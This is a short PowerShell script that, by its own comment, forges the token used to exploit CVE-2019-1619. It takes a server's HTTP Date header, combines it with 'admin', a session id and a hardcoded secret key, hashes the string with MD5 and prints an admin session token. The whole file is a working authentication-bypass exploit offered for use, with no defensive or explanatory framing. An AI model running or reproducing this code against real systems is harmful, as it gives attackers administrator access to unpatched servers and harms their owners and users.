#Builds the token needed to exploit CVE-2019-1619
# Parameter Required: Date field from the HTTP Response Headers
#Usage: .\tokenBuilder.ps1 -Timestamp "Tue, 17 Dec 2024 20:06:54 GMT"

param (
    [Parameter(Mandatory=$true)]
    [string]$Timestamp
)

#Convert the input timestamp to a DateTime object 
try {
    $dateTime = [DateTime]::ParseExact($Timestamp, "ddd, dd MMM yyyy HH:mm:ss 'GMT'", [System.Globalization.CultureInfo]::InvariantCulture)
} catch {
    Write-Error "Invalid timestamp format. Use 'Tue, 17 Dec 2024 19:27:39 GMT'."
    exit
}

#Variables
$epoch = Get-Date -Date "1970-01-01T00:00:00Z" -Format "u"
$unixTime = [Math]::Floor((New-TimeSpan -Start $epoch -End $dateTime).TotalSeconds)
$session_id = "1337"
$secretKey = "POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF" 

#Convert to Milliseconds
$milliseconds = $unixTime * 1000

#Creating MD5 String 
$stringToHash = "admin" + $session_id + $milliseconds.ToString() + $secretKey
$md5 = [System.Security.Cryptography.MD5]::Create()
$hashBytes = $md5.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($stringToHash))
$md5_str = [Convert]::ToBase64String($hashBytes) 

#Creating Token
$token = "$session_id.$($milliseconds.ToString()).$md5_str.admin" 
Write-Output $token